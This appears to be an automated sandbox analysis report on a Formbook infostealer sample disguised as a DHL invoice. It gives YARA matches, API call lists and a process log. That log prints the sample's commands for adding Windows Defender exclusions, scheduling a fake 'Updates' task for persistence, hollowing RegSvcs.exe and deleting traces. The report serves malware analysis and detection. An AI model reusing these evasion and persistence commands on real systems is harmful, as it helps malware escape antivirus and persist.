Source: 00000000.00000002.347699364.0000000003C0C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.347699364.0000000003C0C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000000.344355363.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.344355363.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000000.393741179.00000000078F8000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000000.393741179.00000000078F8000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.430448066.0000000001230000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.430448066.0000000001230000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.347074600.0000000003999000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.347074600.0000000003999000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Detected potential crypto function

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00401030	12_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_0041E223	12_2_0041E223
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_0041DAE4	12_2_0041DAE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_0041DBD5	12_2_0041DBD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_0041D573	12_2_0041D573
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00402D87	12_2_00402D87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00402D90	12_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00409E60	12_2_00409E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_0041E66B	12_2_0041E66B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00402FB0	12_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00FC28EC	12_2_00FC28EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F220A0	12_2_00F220A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00FC20A8	12_2_00FC20A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F0B090	12_2_00F0B090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00FCE824	12_2_00FCE824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00FB1002	12_2_00FB1002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F14120	12_2_00F14120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00EFF900	12_2_00EFF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00FC22AE	12_2_00FC22AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00FB03DA	12_2_00FB03DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00FBDBD2	12_2_00FBDBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F2EBB0	12_2_00F2EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00FC2B28	12_2_00FC2B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00FBD466	12_2_00FBD466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F0841F	12_2_00F0841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F0D5E0	12_2_00F0D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00FC25DD	12_2_00FC25DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F22581	12_2_00F22581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00FC1D55	12_2_00FC1D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00EF0D20	12_2_00EF0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00FC2D07	12_2_00FC2D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00FC2EF7	12_2_00FC2EF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F16E30	12_2_00F16E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00FBD616	12_2_00FBD616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00FC1FF1	12_2_00FC1FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00FCDFCE	12_2_00FCDFCE
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E920A8	23_2_04E920A8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04DDB090	23_2_04DDB090
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04DF20A0	23_2_04DF20A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04DD841F	23_2_04DD841F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E81002	23_2_04E81002
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E925DD	23_2_04E925DD
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04DDD5E0	23_2_04DDD5E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04DF2581	23_2_04DF2581
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E91D55	23_2_04E91D55
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04DCF900	23_2_04DCF900
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E92D07	23_2_04E92D07
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04DC0D20	23_2_04DC0D20
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04DE4120	23_2_04DE4120
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E92EF7	23_2_04E92EF7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E922AE	23_2_04E922AE
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04DE6E30	23_2_04DE6E30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E91FF1	23_2_04E91FF1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E8DBD2	23_2_04E8DBD2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04DFEBB0	23_2_04DFEBB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E92B28	23_2_04E92B28
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_00E7DAE4	23_2_00E7DAE4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_00E62D87	23_2_00E62D87
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_00E62D90	23_2_00E62D90
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_00E7D573	23_2_00E7D573
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_00E69E60	23_2_00E69E60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_00E7E66B	23_2_00E7E66B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_00E62FB0	23_2_00E62FB0

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00EFB150 appears 45 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 04DCB150 appears 35 times

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_0041A330 NtCreateFile,	12_2_0041A330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_0041A3E0 NtReadFile,	12_2_0041A3E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_0041A460 NtClose,	12_2_0041A460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_0041A510 NtAllocateVirtualMemory,	12_2_0041A510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_0041A3DA NtReadFile,	12_2_0041A3DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_0041A50A NtAllocateVirtualMemory,	12_2_0041A50A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F398F0 NtReadVirtualMemory,LdrInitializeThunk,	12_2_00F398F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F39860 NtQuerySystemInformation,LdrInitializeThunk,	12_2_00F39860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F39840 NtDelayExecution,LdrInitializeThunk,	12_2_00F39840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F399A0 NtCreateSection,LdrInitializeThunk,	12_2_00F399A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F39910 NtAdjustPrivilegesToken,LdrInitializeThunk,	12_2_00F39910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F39A50 NtCreateFile,LdrInitializeThunk,	12_2_00F39A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F39A20 NtResumeThread,LdrInitializeThunk,	12_2_00F39A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F39A00 NtProtectVirtualMemory,LdrInitializeThunk,	12_2_00F39A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F395D0 NtClose,LdrInitializeThunk,	12_2_00F395D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F39540 NtReadFile,LdrInitializeThunk,	12_2_00F39540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F396E0 NtFreeVirtualMemory,LdrInitializeThunk,	12_2_00F396E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F39660 NtAllocateVirtualMemory,LdrInitializeThunk,	12_2_00F39660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F397A0 NtUnmapViewOfSection,LdrInitializeThunk,	12_2_00F397A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F39780 NtMapViewOfSection,LdrInitializeThunk,	12_2_00F39780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F39710 NtQueryInformationToken,LdrInitializeThunk,	12_2_00F39710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F398A0 NtWriteVirtualMemory,	12_2_00F398A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F3B040 NtSuspendThread,	12_2_00F3B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F39820 NtEnumerateKey,	12_2_00F39820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F399D0 NtCreateProcessEx,	12_2_00F399D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F39950 NtQueueApcThread,	12_2_00F39950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F39A80 NtOpenDirectoryObject,	12_2_00F39A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F39A10 NtQuerySection,	12_2_00F39A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F3A3B0 NtGetContextThread,	12_2_00F3A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F39B00 NtSetValueKey,	12_2_00F39B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F395F0 NtQueryInformationFile,	12_2_00F395F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F39560 NtWriteFile,	12_2_00F39560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F3AD30 NtSetContextThread,	12_2_00F3AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F39520 NtWaitForSingleObject,	12_2_00F39520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F396D0 NtCreateKey,	12_2_00F396D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F39670 NtQueryInformationProcess,	12_2_00F39670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F39650 NtQueryValueKey,	12_2_00F39650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F39610 NtEnumerateValueKey,	12_2_00F39610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F39FE0 NtCreateMutant,	12_2_00F39FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F39770 NtSetInformationFile,	12_2_00F39770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F3A770 NtOpenThread,	12_2_00F3A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F39760 NtOpenProcess,	12_2_00F39760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F39730 NtQueryVirtualMemory,	12_2_00F39730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F3A710 NtOpenProcessToken,	12_2_00F3A710
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E09860 NtQuerySystemInformation,LdrInitializeThunk,	23_2_04E09860
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E09840 NtDelayExecution,LdrInitializeThunk,	23_2_04E09840
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E095D0 NtClose,LdrInitializeThunk,	23_2_04E095D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E099A0 NtCreateSection,LdrInitializeThunk,	23_2_04E099A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E09540 NtReadFile,LdrInitializeThunk,	23_2_04E09540
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E09910 NtAdjustPrivilegesToken,LdrInitializeThunk,	23_2_04E09910
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E096E0 NtFreeVirtualMemory,LdrInitializeThunk,	23_2_04E096E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E096D0 NtCreateKey,LdrInitializeThunk,	23_2_04E096D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E09660 NtAllocateVirtualMemory,LdrInitializeThunk,	23_2_04E09660
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E09650 NtQueryValueKey,LdrInitializeThunk,	23_2_04E09650
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E09A50 NtCreateFile,LdrInitializeThunk,	23_2_04E09A50
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E09FE0 NtCreateMutant,LdrInitializeThunk,	23_2_04E09FE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E09780 NtMapViewOfSection,LdrInitializeThunk,	23_2_04E09780
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E09710 NtQueryInformationToken,LdrInitializeThunk,	23_2_04E09710
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E098F0 NtReadVirtualMemory,	23_2_04E098F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E098A0 NtWriteVirtualMemory,	23_2_04E098A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E0B040 NtSuspendThread,	23_2_04E0B040
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E09820 NtEnumerateKey,	23_2_04E09820
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E095F0 NtQueryInformationFile,	23_2_04E095F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E099D0 NtCreateProcessEx,	23_2_04E099D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E09560 NtWriteFile,	23_2_04E09560
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E09950 NtQueueApcThread,	23_2_04E09950
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E09520 NtWaitForSingleObject,	23_2_04E09520
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E0AD30 NtSetContextThread,	23_2_04E0AD30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E09A80 NtOpenDirectoryObject,	23_2_04E09A80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E09670 NtQueryInformationProcess,	23_2_04E09670
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E09A20 NtResumeThread,	23_2_04E09A20
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E09A00 NtProtectVirtualMemory,	23_2_04E09A00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E09610 NtEnumerateValueKey,	23_2_04E09610
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E09A10 NtQuerySection,	23_2_04E09A10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E097A0 NtUnmapViewOfSection,	23_2_04E097A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E0A3B0 NtGetContextThread,	23_2_04E0A3B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E09760 NtOpenProcess,	23_2_04E09760
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E09770 NtSetInformationFile,	23_2_04E09770
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E0A770 NtOpenThread,	23_2_04E0A770
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E09730 NtQueryVirtualMemory,	23_2_04E09730
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E09B00 NtSetValueKey,	23_2_04E09B00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E0A710 NtOpenProcessToken,	23_2_04E0A710
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_00E7A3E0 NtReadFile,	23_2_00E7A3E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_00E7A330 NtCreateFile,	23_2_00E7A330
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_00E7A460 NtClose,	23_2_00E7A460
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_00E7A510 NtAllocateVirtualMemory,	23_2_00E7A510
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_00E7A3DA NtReadFile,	23_2_00E7A3DA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_00E7A50A NtAllocateVirtualMemory,	23_2_00E7A50A

Sample file is different than original file name gathered from version info

Source: DHL-D02816048INV.exe	Binary or memory string: OriginalFilename vs DHL-D02816048INV.exe
Source: DHL-D02816048INV.exe, 00000000.00000002.345729931.0000000000BFA000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs DHL-D02816048INV.exe
Source: DHL-D02816048INV.exe, 00000000.00000002.349641266.0000000005B80000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenameUI.dllF vs DHL-D02816048INV.exe
Source: DHL-D02816048INV.exe, 00000000.00000002.345361278.0000000000512000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameRuntimeModu.exe4 vs DHL-D02816048INV.exe
Source: DHL-D02816048INV.exe, 00000000.00000002.347074600.0000000003999000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameUI.dllF vs DHL-D02816048INV.exe
Source: DHL-D02816048INV.exe, 00000000.00000002.346211763.0000000002991000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameInnerException.dll" vs DHL-D02816048INV.exe
Source: DHL-D02816048INV.exe	Binary or memory string: OriginalFilenameRuntimeModu.exe4 vs DHL-D02816048INV.exe

Source: DHL-D02816048INV.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: DHL-D02816048INV.exe	Virustotal: Detection: 21%
Source: DHL-D02816048INV.exe	ReversingLabs: Detection: 37%

Source: C:\Users\user\Desktop\DHL-D02816048INV.exe

File read: C:\Users\user\Desktop\DHL-D02816048INV.exe

Source: unknown	Process created: C:\Users\user\Desktop\DHL-D02816048INV.exe "C:\Users\user\Desktop\DHL-D02816048INV.exe"
Source: C:\Users\user\Desktop\DHL-D02816048INV.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL-D02816048INV.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL-D02816048INV.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nWINpvYSWNVQ.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL-D02816048INV.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nWINpvYSWNVQ" /XML "C:\Users\user\AppData\Local\Temp\tmpA63A.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL-D02816048INV.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Users\user\Desktop\DHL-D02816048INV.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL-D02816048INV.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL-D02816048INV.exe	Jump to behavior
Source: C:\Users\user\Desktop\DHL-D02816048INV.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nWINpvYSWNVQ.exe	Jump to behavior
Source: C:\Users\user\Desktop\DHL-D02816048INV.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nWINpvYSWNVQ" /XML "C:\Users\user\AppData\Local\Temp\tmpA63A.tmp	Jump to behavior
Source: C:\Users\user\Desktop\DHL-D02816048INV.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\Desktop\DHL-D02816048INV.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DHL-D02816048INV.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
